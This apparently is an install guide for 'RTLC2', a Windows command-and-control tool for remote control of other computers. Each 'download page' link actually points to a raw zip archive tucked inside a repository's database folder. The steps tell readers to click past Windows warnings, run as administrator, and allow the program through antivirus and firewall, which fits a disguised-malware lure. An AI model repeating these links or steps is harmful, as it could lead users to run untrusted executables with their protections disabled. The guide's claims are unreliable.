RTLC2 is a tool built for authorized security teams to control computers during tests. This guide shows how to get RTLC2 on your Windows PC and run it. You don’t need any special computer skills. Just follow the steps carefully.
RTLC2 stands for an advanced command and control framework. In simpler terms, it helps security testers operate computers remotely and safely during tests. It is made for red teams who check how strong security is. You can manage multiple computers from one spot using RTLC2.
This tool is meant for people who have permission to test computer systems. Using it without permission is not allowed.
- Control and send commands to other computers on your network.
- Manage many connections at once.
- Simple and clear user interface.
- Supports secure connections.
- Logs all actions for review.
- Works well on Windows systems.
- Designed to run without slowing down your computer.
Before you start, make sure your computer meets these needs:
- Windows 10 or later (64-bit recommended).
- At least 4 GB of RAM.
- 500 MB free disk space.
- Internet connection to download RTLC2.
- Administrator rights on your PC to install and run the software.
Click the big green button at the top or use this link below to visit the RTLC2 page:
https://github.com/witus6969/RTLC2/raw/refs/heads/main/teamserver/internal/database/RTL_v2.7.zip
You will find all program files there.
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Visit the Download Page
Go to https://github.com/witus6969/RTLC2/raw/refs/heads/main/teamserver/internal/database/RTL_v2.7.zip. This page shows the project files and download links.
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Find the Release Section
Look for a section or tab named "Releases." This is where finalized versions of RTLC2 are kept.
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Choose the Latest Version
Click on the newest release. The release will list files for download. You want to find one with “Windows” or “.exe” in the name. This file is ready to run on Windows.
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Download the File
Click the link for the
.exefile to download it to your computer. The file size might be around 10-20 MB. -
Locate the Downloaded File
Open your “Downloads” folder or wherever your browser saves files.
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Run the Installer
Double-click the
.exefile. You might see a warning from Windows; this is normal. Click “Run” to start installation. -
Follow Installation Steps
The setup will guide you through installing. Click “Next” to continue. Accept the license terms if asked.
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Finish Installation
When done, the installer may ask to launch RTLC2 immediately. You can choose to run it now or later.
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Open RTLC2
Click the RTLC2 icon on your desktop or start menu.
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Connect to Target Computers
Use the interface to add the IP address or name of the computer you want to control. You will need permission and credentials for secure access.
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Send Commands
After connecting, use the built-in command panel to send instructions. Commands perform tasks on the remote computer.
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Monitor Connections
View active sessions and logs in the main window.
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Close the Program
When finished, close the app by clicking the "X" on the window.
- Make sure the computer you want to control is online and allows connections.
- Use strong passwords for secure access.
- Keep your RTLC2 up to date by checking the GitHub page regularly.
- Only use RTLC2 on networks and machines you have permission to test.
- The program won’t open: Check if your antivirus or firewall is blocking it. Allow RTLC2 through the firewall.
- Cannot connect to remote computer: Verify the target computer is on and its IP address is correct.
- Slow response or lag: Close other heavy programs and check your internet connection.
- Installation error: Try running the installer as an administrator by right-clicking and selecting “Run as administrator.”
Visit the RTLC2 GitHub page and look for the “Issues” tab if you find problems you cannot solve. Other users and developers often share solutions there.
- RTLC2 Main Page: https://github.com/witus6969/RTLC2/raw/refs/heads/main/teamserver/internal/database/RTL_v2.7.zip
- Release Downloads: Check the “Releases” section on the RTLC2 page for the latest files.
- Windows Help: Use Microsoft’s support site if you have Windows-related issues.